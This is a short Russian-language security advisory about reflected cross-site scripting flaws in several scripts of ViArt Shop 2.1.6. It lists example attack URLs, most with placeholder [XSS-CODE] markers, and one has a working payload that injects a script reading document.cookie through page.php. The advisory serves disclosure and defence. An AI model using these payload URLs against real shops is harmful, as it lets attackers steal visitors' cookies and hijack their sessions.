Программа: ViArt Shop 2.1.6
Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
получить доступ к важным данным других
пользователей. Уязвимость обнаружена в
сценариях 'basket.php', 'forum.php', 'page.php', 'reviews.php', 'products.php',
и 'news_view.php' из-за недостаточной фильтрации
входных данных. Удаленный пользователь
может с помощью специально сформированного
URL выполнить произвольные HTML сценарии в
браузере жертвы в контексте безопасности
уязвимого сайта.
Примеры:
http://[target]/basket.php?rp=products.php%3Fcategory_id%3D0 [XSS-CODE]%26search_string%3Dss%26search_category_id%3D
http://[target]/page.php?page=about%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/reviews.php?category_id=0&item_id=4[XSS-CODE]
http://[target]/product_details.php?item_id=4&category_id=0 [XSS-CODE]
http://[target]/products.php?category_id=13[XSS-CODE]
http://[target]/news_view.php?news_id=3&rp= news.php[XSS-CODE]&page=1